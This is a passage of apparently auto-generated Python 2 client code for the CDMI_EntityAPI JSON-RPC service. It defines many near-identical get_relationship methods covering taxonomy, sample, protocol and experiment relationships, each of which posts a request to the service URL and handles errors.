body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Summarizes(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Summarizes',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsSuperclassOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsSuperclassOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsSubclassOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsSubclassOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsTaxonomyOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsTaxonomyOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsInTaxa(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsInTaxa',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsTerminusFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsTerminusFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasAsTerminus(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasAsTerminus',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsTriggeredBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsTriggeredBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Triggers(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Triggers',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsUsedToBuildTree(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsUsedToBuildTree',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsBuiltFromAlignment(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsBuiltFromAlignment',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Manages(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Manages',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsManagedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsManagedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_OntologyForSample(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_OntologyForSample',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SampleHasOntology(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SampleHasOntology',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_OperatesIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_OperatesIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsUtilizedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsUtilizedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_OrdersExperimentalUnit(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_OrdersExperimentalUnit',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsTimepointOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsTimepointOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Overlaps(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Overlaps',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IncludesPartOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IncludesPartOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ParticipatesAs(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ParticipatesAs',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsParticipationOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsParticipationOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_PerformedExperiment(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_PerformedExperiment',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_PerformedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_PerformedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_PersonAnnotatedSample(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_PersonAnnotatedSample',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SampleAnnotatedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SampleAnnotatedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_PlatformWithSamples(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_PlatformWithSamples',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SampleRunOnPlatform(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SampleRunOnPlatform',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ProducedResultsFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ProducedResultsFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HadResultsProducedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HadResultsProducedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ProtocolForSample(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ProtocolForSample',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SampleUsesProtocol(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SampleUsesProtocol',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
